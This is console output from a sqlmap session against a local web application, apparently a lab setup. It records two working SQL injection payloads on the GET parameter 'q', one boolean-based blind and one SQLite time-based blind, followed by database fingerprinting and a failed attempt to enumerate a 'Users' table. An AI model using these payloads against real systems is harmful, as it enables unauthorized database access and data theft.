        ___
       __H__
 ___ ___[']_____ ___ ___  {1.10.3#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:52:06 /2026-04-15/

[03:52:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: q (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=test%' AND 6253=6253 AND 'JIXT%'='JIXT

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: q=test%' AND 3779=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'WuwG%'='WuwG
---
[03:52:06] [INFO] testing SQLite
[03:52:06] [INFO] confirming SQLite
[03:52:06] [INFO] actively fingerprinting SQLite
[03:52:06] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[03:52:06] [INFO] retrieving the length of query output

[03:52:06] [INFO] retrieved: 

[03:52:07] [INFO] retrieved: 
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N

[03:52:08] [INFO] retrieved: [03:52:08] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)
[03:52:09] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 

[03:52:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[03:52:09] [WARNING] unable to enumerate the columns for table 'Users'
[03:52:09] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[03:52:09] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'

[*] ending @ 03:52:09 /2026-04-15/

